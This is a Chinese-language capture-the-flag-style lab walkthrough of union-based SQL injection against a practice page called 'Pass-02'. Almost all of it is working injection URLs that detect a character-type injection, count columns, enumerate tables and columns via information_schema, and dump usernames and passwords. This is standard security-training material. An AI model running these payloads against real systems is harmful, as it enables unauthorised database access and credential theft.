sql_lab中sql注入之union联合注入
1.判断注入类型
gxalabs.com?-?该网站正在出售!?-?gxalabs 资源和信息。?没有回显
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1 and 1=1?
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1 and 1=2?and1=1和and1=2回显效果一致,则判断不是数字型
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1''?有回显
则判断出是字符型注入,且注入是’注入
2.判断注入点
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' and 1=1 --+?表示and两边结果为真,返回结果正常
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' and 1=2 --+?表示一边为真一边为假,没有返回值
则判断是sql注入
3.判断字段数量
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' order by 5 --+ 没有结果
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' order by 4 --+?没有结果
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' order by 3 --+?有回显结果
说明该数据库的字段数量是3
4.用union联合查询,判断回显点
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,2,3 --+
5.查询使用的是那个数据库
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,database(),3 --+
6.查询表名
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema="security" --+
查询到了security数据库里面的所有表名
7.查询users表里面的字段名
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+
8.查username和password
http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!